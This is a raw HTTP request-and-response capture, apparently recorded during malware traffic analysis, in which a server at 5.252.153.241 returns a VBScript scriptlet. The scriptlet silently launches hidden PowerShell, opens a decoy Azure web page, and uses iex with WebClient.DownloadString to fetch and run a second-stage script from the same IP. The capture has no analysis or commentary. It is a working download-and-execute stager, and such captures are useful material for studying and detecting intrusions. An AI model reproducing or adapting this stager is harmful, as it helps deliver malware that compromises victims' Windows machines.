GET /api/file/get-file/264872 HTTP/1.1

Accept: */*

UA-CPU: AMD64

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64;
x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR
3.0.30729; .NET CLR 3.5.30729)

Host: 5.252.153.241

Connection: Keep-Alive



HTTP/1.1 200 OK

X-Powered-By: Express

Access-Control-Allow-Origin: *

Accept-Ranges: bytes

Cache-Control: public, max-age=0

Last-Modified: Wed, 22 Jan 2025 16:21:51 GMT

ETag: W/"1a1-1948ed1f354"

Content-Type: application/octet-stream

Content-Length: 417

Date: Wed, 22 Jan 2025 19:45:56 GMT

Connection: keep-alive

Keep-Alive: timeout=5


<component>

<script language="VBScript">


On Error Resume Next

Set objShell = CreateObject("Wscript.Shell")

objShell.Run("cmd /c start /min powershell -NoProfile -WindowStyle
Hidden -Command ""start-process 'https://azure.microsoft.com'; iex
(new-object System.Net.WebClient).'DownloadString'('http://5.252.153.241:80/api/file/get-file/29842.ps1');#URL:
https://teams.microsoft.com""")


</script>

</component>